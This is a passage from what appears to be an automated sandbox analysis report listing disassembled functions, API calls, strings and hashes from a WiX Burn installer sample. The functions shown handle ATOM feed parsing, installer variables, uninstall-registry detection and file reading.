                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 38ac1f211c1471da0596ad9e5efe5fe893eaecc8788cd184848d172d993e20f2
                                                                                                                                                                                                                                                                            • Instruction ID: cb83c003570586c82901f1ab034564c7193a93debbb1c69ca766c467228d9133
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38ac1f211c1471da0596ad9e5efe5fe893eaecc8788cd184848d172d993e20f2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA31C476900219AFCB24DFA9CC89EBBB7BDEB84310F144599F915D7254EA30EE408F64
                                                                                                                                                                                                                                                                            Function 00927142 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00047150,009268C5), ref: 00927147
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9753846ddebddcf70c29ed45b5f0f3f7ebcd499c9048406afb54d123a0a00179
                                                                                                                                                                                                                                                                            • Instruction ID: d04a3267a62ac2871b690bee63e0f74932e3f9143a0d256dca6601616613cfa7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9753846ddebddcf70c29ed45b5f0f3f7ebcd499c9048406afb54d123a0a00179
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                            Function 0091DAA4 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 31c81ea08619909c6322d62b5e957f97260132f134e6dfb16b0fb80343a7b8f4
                                                                                                                                                                                                                                                                            • Instruction ID: 9e80358fa90fc8afae3413cef157a38a0479164d59a6c87f2a766193f13fe606
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31c81ea08619909c6322d62b5e957f97260132f134e6dfb16b0fb80343a7b8f4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0B13870A01B0AABDB24EF79D885BDAB7E9FF04305F15482DE4AA97651C774F880CB50
                                                                                                                                                                                                                                                                            Function 0091940D Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f45917a54f30991107f6fb82b6191d13c0f43520db1c78e611fe930a6d6763fd
                                                                                                                                                                                                                                                                            • Instruction ID: 5f37a8337b1dc293f5ffde99fb1e90dbbd61af5b8b096c9782ec68a2dfb1d018
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f45917a54f30991107f6fb82b6191d13c0f43520db1c78e611fe930a6d6763fd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF410432B9422C8ADF2ECE3D85796F6369AF781304F24843DE943926E9D531D9C3CA00
                                                                                                                                                                                                                                                                            Function 009497FB Relevance: 79.2, APIs: 11, Strings: 34, Instructions: 471COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,0096EC58,000000FF,?,?,?), ref: 00949914
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 00949956
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 0094999B
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 009499E0
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 00949A25
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00949A6A
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 00949AA7
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 00949AE4
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,link,000000FF), ref: 00949B3E
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00949B88
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00949D3A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Compare$Free
                                                                                                                                                                                                                                                                            • String ID: Cannot have two content elements in ATOM entry.$Failed to allocate ATOM entry authors.$Failed to allocate ATOM entry categories.$Failed to allocate ATOM entry content.$Failed to allocate ATOM entry id.$Failed to allocate ATOM entry links.$Failed to allocate ATOM entry published.$Failed to allocate ATOM entry summary.$Failed to allocate ATOM entry title.$Failed to allocate ATOM entry updated.$Failed to find required feed/entry/id element.$Failed to find required feed/entry/title element.$Failed to find required feed/entry/updated element.$Failed to get child nodes of ATOM entry element.$Failed to parse ATOM entry author.$Failed to parse ATOM entry category.$Failed to parse ATOM entry content.$Failed to parse ATOM entry link.$Failed to parse unknown ATOM entry element: %ls$Failed to process all ATOM entry elements.$author$cabinet.dll$category$clbcatq.dll$content$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                                                                                                                                            • API String ID: 318886736-3340435141
                                                                                                                                                                                                                                                                            • Opcode ID: 46d4ba0c7a79969ba2f666a039c6e58cf309c261ce41e96de6903242b5c846ab
                                                                                                                                                                                                                                                                            • Instruction ID: 1056a5805e968d67fbbb856419a678fc9eb3cc8c6d38a29686db1fd9fafe20a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46d4ba0c7a79969ba2f666a039c6e58cf309c261ce41e96de6903242b5c846ab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62E10632A88305BBDF218B94CC4AF6F7679EB85B25F214265F614BB2D0EAB09D00D750
                                                                                                                                                                                                                                                                            Function 00913672 Relevance: 75.7, APIs: 6, Strings: 37, Instructions: 484COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: VariantInit.OLEAUT32(?), ref: 009401F5
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: VariantClear.OLEAUT32(?), ref: 00940340
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: SysFreeString.OLEAUT32(00000000), ref: 0094034B
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,condition,00000000,?,DetectionType,?,00000000,?,00000000,00000002,?,008F6624,00000000), ref: 009136DB
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,arp,00000000,?,008F6624,00000000,?), ref: 009137DB
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: SysAllocString.OLEAUT32(?), ref: 0094022F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                            • String ID: ArpDisplayVersion$ArpId$ArpWin64$Bundle$DetectCondition$DetectionType$Failed to build full key path.$Failed to get @ArpDisplayVersion.$Failed to get @ArpId.$Failed to get @ArpWin64.$Failed to get @Bundle.$Failed to get @DetectCondition.$Failed to get @DetectionType.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to get @Uninstallable.$Failed to parse @ArpDisplayVersion: %ls$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid detection type: %ls$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$UninstallArguments$Uninstallable$arp$burn$condition$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp$netfx4$none
                                                                                                                                                                                                                                                                            • API String ID: 702752599-1746888974
                                                                                                                                                                                                                                                                            • Opcode ID: e98a183f4438e0538f9397261fb2e5d7d6b5040d8e1ccc47b36346be3bc4a528
                                                                                                                                                                                                                                                                            • Instruction ID: 9d258a9f20481aa3f9d46393821ae6197537a1caa30e2590b5f45f7fa401dcc2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e98a183f4438e0538f9397261fb2e5d7d6b5040d8e1ccc47b36346be3bc4a528
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95E12971BC0729B6D631A6614C4BFFB696C9B45F64F11C210FB58BB1C0D2A49F8096E0
                                                                                                                                                                                                                                                                            Function 0094B193 Relevance: 66.9, APIs: 9, Strings: 29, Instructions: 385COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,?,00000000,00000000), ref: 0094B1BE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0094B1DD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate application identity.$Failed to allocate application summary.$Failed to allocate application title.$Failed to allocate application type.$Failed to allocate content type.$Failed to allocate content.$Failed to allocate enclosures for application update entry.$Failed to allocate upgrade id.$Failed to compare version to upgrade version.$Failed to parse enclosure.$Failed to parse upgrade version string '%ls' from ATOM entry.$Failed to parse version string '%ls' from ATOM entry.$Upgrade version is greater than or equal to application version.$application$clbcatq.dll$comres.dll$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$msasn1.dll$msi.dll$true$type$upgrade$version$version.dll$wininet.dll
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-1736944660
                                                                                                                                                                                                                                                                            • Opcode ID: 8754de8d021e4f00560463b80f414fd5ae869da5df58b26132f6a691d64a67b5
                                                                                                                                                                                                                                                                            • Instruction ID: d9e7c2a98d40c39c6e74fa871af71fa89105981b0df0d8c0c25f6f64430c762b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8754de8d021e4f00560463b80f414fd5ae869da5df58b26132f6a691d64a67b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68D1F532684701FBDB219F55CC4AF5B77A9AB85B24F318655F624BB2D2DBB0E900DB00
                                                                                                                                                                                                                                                                            Function 008EBA68 Relevance: 65.2, APIs: 6, Strings: 31, Instructions: 490COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,008E7D9B,008E7DDB,?,009040B9,?,?,008E7D5B,?,?,?,?,?,008E7D9B), ref: 008EBA98
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000,?,009040B9,?,?,008E7D5B,?,?,?,?,?,008E7D9B), ref: 008EC00D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Attempt to add built-in variable: %ls$Attempt to add variable again: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant value.$Hidden$Initializing formatted variable '%ls' to value '%ls'$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$d:\a\wix4\wix4\src\burn\engine\variable.cpp$formatted$numeric$string$version
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1770900757
                                                                                                                                                                                                                                                                            • Opcode ID: a5324e2550a743b6d67285b41ada596413ae1caa8244fbec21c473ee2a0bd9d9
                                                                                                                                                                                                                                                                            • Instruction ID: 8691c17acccc48ce20b7e55a542b5a221f02aa1b3b2b63010b1b69f10b89839b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5324e2550a743b6d67285b41ada596413ae1caa8244fbec21c473ee2a0bd9d9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8F12331A84259BBDF11DA96CC0AFEF7A75FF8AB15F210014FA14FA1D1DBB19A009B50
                                                                                                                                                                                                                                                                            Function 0094A38B Relevance: 54.6, APIs: 8, Strings: 23, Instructions: 334COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,rel,00000000,?,?,?,00000000), ref: 0094A40F
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094A6E8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • msi.dll, xrefs: 0094A624
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM link href., xrefs: 0094A46F
                                                                                                                                                                                                                                                                            • msasn1.dll, xrefs: 0094A6B6
                                                                                                                                                                                                                                                                            • version.dll, xrefs: 0094A552
                                                                                                                                                                                                                                                                            • href, xrefs: 0094A442
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM link value., xrefs: 0094A6C2
                                                                                                                                                                                                                                                                            • title, xrefs: 0094A4D4
                                                                                                                                                                                                                                                                            • type, xrefs: 0094A512
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM link rel., xrefs: 0094A42D
                                                                                                                                                                                                                                                                            • crypt32.dll, xrefs: 0094A45F
                                                                                                                                                                                                                                                                            • Failed to parse unknown ATOM link attribute: %ls, xrefs: 0094A5B0
                                                                                                                                                                                                                                                                            • Failed to parse unknown ATOM link element: %ls, xrefs: 0094A692
                                                                                                                                                                                                                                                                            • comres.dll, xrefs: 0094A49E
                                                                                                                                                                                                                                                                            • Failed get attributes for ATOM link., xrefs: 0094A3BE
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0094A3CD, 0094A6A1, 0094A6D1
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM link type., xrefs: 0094A53B
                                                                                                                                                                                                                                                                            • Failed to parse ATOM link length., xrefs: 0094A4BF
                                                                                                                                                                                                                                                                            • Failed to process all ATOM link attributes., xrefs: 0094A5C6
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM link title., xrefs: 0094A4FD
                                                                                                                                                                                                                                                                            • rel, xrefs: 0094A403
                                                                                                                                                                                                                                                                            • Failed to process all ATOM link elements., xrefs: 0094A67E
                                                                                                                                                                                                                                                                            • Failed to get child nodes of ATOM link element., xrefs: 0094A5F7
                                                                                                                                                                                                                                                                            • length, xrefs: 0094A484
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$CompareFree
                                                                                                                                                                                                                                                                            • String ID: Failed get attributes for ATOM link.$Failed to allocate ATOM link href.$Failed to allocate ATOM link rel.$Failed to allocate ATOM link title.$Failed to allocate ATOM link type.$Failed to allocate ATOM link value.$Failed to get child nodes of ATOM link element.$Failed to parse ATOM link length.$Failed to parse unknown ATOM link attribute: %ls$Failed to parse unknown ATOM link element: %ls$Failed to process all ATOM link attributes.$Failed to process all ATOM link elements.$comres.dll$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                                                                                                                                                            • API String ID: 3589242889-4187876800
                                                                                                                                                                                                                                                                            • Opcode ID: 70b9c0bf68002aeeb42fc4dc841b39c6cdd9754f1eac411a23d5d26b686470aa
                                                                                                                                                                                                                                                                            • Instruction ID: a64ad7de9fcde37cd56be0a1b3e6cbe0a6037a8b52b0c1d63befaf494e47b1eb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70b9c0bf68002aeeb42fc4dc841b39c6cdd9754f1eac411a23d5d26b686470aa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDB1E236AD4208BBDF129B90CC49FAF3B79EBC5B15F154059F608A71E0EB709A00EB51
                                                                                                                                                                                                                                                                            Function 00943559 Relevance: 45.9, APIs: 10, Strings: 16, Instructions: 391fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000024,80000000,00000024,00000000,00000003,08000080,00000000,00000000,00000000,00000024,000000F8,00000001,00000000,000000F8,00000024,?), ref: 0094364E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094365C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094366E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CreateFile
                                                                                                                                                                                                                                                                            • String ID: *wzSrcPath is null$Failed to allocate memory to read in file: %ls$Failed to completely read file: %ls$Failed to get size of file: %ls$Failed to load file: %ls, too large.$Failed to open file: %ls$Failed to re-allocate memory to read in file: %ls$Failed to read from file: %ls$Failed to seek position %d$Invalid argument pcbDest$Invalid argument ppbDest$Invalid argument wzSrcPath$Start position %d bigger than file '%ls' size %llu$Underflow calculating remaining buffer size.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1722934493-1341987655
                                                                                                                                                                                                                                                                            • Opcode ID: d7842f2e51f3db193ba9a5133f698a47241cc3b1366253d0ce9d72e8424b3feb
                                                                                                                                                                                                                                                                            • Instruction ID: 5b241412f9b96d71e890867f046e5b512916acdb605778d264dad6c2ca9e85a2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7842f2e51f3db193ba9a5133f698a47241cc3b1366253d0ce9d72e8424b3feb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AC1FCB2B80315BBEB209A758C4FF7F7668EF45B54F118119B915FB2C1E7B48E009690
                                                                                                                                                                                                                                                                            Function 008FB6BD Relevance: 42.2, APIs: 9, Strings: 15, Instructions: 250sleepfileCOMMON
